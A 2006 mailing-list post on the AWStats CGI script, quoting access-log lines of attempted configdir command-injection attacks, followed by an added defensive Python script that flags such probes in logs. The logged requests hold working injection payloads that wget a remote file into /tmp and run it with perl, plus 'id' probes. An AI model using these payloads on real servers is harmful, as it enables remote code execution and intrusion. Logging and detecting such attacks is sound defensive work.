awstats

Jonathan Stowe jns at gellyfish.com
Wed Mar 8 09:27:10 GMT 2006


On Wed, 2006-03-08 at 08:45, Jonathan McKeown wrote:
> A 10Kline CGI script, with most variables global and including its own CGI 
> parameter parsing. 

I'd say it has a widely known and exploitable flaw:

access.log:64.49.219.174 - - [08/Mar/2005:15:51:21 +0000] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;wget%20http://64.51.188.10/images/sess_3539283e27d73cae29fe2b80f9293f57;perl%20sess_3539283e27d73cae29fe2b80f9293f57;pwd;echo%20;echo| HTTP/1.1" 404 313
access.log:64.49.219.174 - - [08/Mar/2005:15:51:22 +0000] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;wget%20http://64.51.188.10/images/sess_3539283e27d73cae29fe2b80f9293f57;perl%20sess_3539283e27d73cae29fe2b80f9293f57;pwd;echo%20;echo| HTTP/1.1" 404 313
access.log:66.154.95.160 - - [15/Mar/2005:15:50:42 +0000] "GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 322
access.log:66.154.95.160 - - [15/Mar/2005:15:50:42 +0000] "GET //cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 314
access.log:66.154.95.160 - - [15/Mar/2005:15:50:42 +0000] "GET //cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 310
access.log:66.154.95.160 - - [15/Mar/2005:15:50:42 +0000] "GET //cp/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 317
access.log:66.154.95.160 - - [15/Mar/2005:15:50:43 +0000] "GET //stat-cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 315
access.log:66.154.95.160 - - [15/Mar/2005:15:50:43 +0000] "GET //awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 314

It's still going on.

/J\
-- 

This e-mail is sponsored by http://www.integration-house.com/
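
A defender's check for the probe pattern in the log excerpt above, as an added example that is not part of the original e-mail: it scans access-log lines for requests to awstats.pl whose decoded configdir parameter contains shell metacharacters, and groups the hits by client IP. The sample lines are constructed (documentation IP ranges), and the names `scan` and `configdir_values` are assumptions of this example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample lines (documentation IP ranges), Apache common log format.
SAMPLE_LOG = """\
192.0.2.10 - - [15/Mar/2005:15:50:42 +0000] "GET //cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 314
192.0.2.10 - - [15/Mar/2005:15:50:43 +0000] "GET //awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 314
198.51.100.7 - - [15/Mar/2005:16:02:11 +0000] "GET /awstats/awstats.pl?config=example.org HTTP/1.1" 200 5120
198.51.100.9 - - [15/Mar/2005:16:05:00 +0000] "GET /cgi-bin/awstats.pl?configdir=%7Cid%7C HTTP/1.1" 200 1024
"""

# Optional "file.log:" prefix covers grep output such as the lines quoted above.
LINE_RE = re.compile(
    r'^(?:[\w./-]+\.log(?:\.\d+)?:)?(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"\S+ (?P<target>.*) HTTP/[\d.]+" (?P<status>\d{3}) \S+'
)
SHELL_META = set("|;`$&<>")

def configdir_values(query):
    """Yield each decoded configdir value; split by hand so ';' stays in the value."""
    for pair in query.split("&"):
        key, _, raw = pair.partition("=")
        if unquote_plus(key).lower() == "configdir":
            yield unquote_plus(raw)

def scan(lines):
    """Return {ip: {"probes": n, "reached": [(ts, path, value), ...]}}."""
    report = defaultdict(lambda: {"probes": 0, "reached": []})
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        path, _, query = m["target"].partition("?")
        if not path.lower().endswith("awstats.pl"):
            continue
        for value in configdir_values(query):
            if SHELL_META & set(value):
                entry = report[m["ip"]]
                entry["probes"] += 1
                # A 2xx means the script exists at that path: check its version
                # and the host; the status alone does not prove a command ran.
                if m["status"].startswith("2"):
                    entry["reached"].append((m["ts"], path, value))
    return dict(report)

if __name__ == "__main__":
    for ip, info in scan(SAMPLE_LOG.splitlines()).items():
        print(ip, info["probes"], "probe(s);", len(info["reached"]), "reached the script")
```

Requests that drew a 404, like every line in the excerpt, only show that the script was not at the guessed path; the entries under `reached` are the ones to follow up on.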


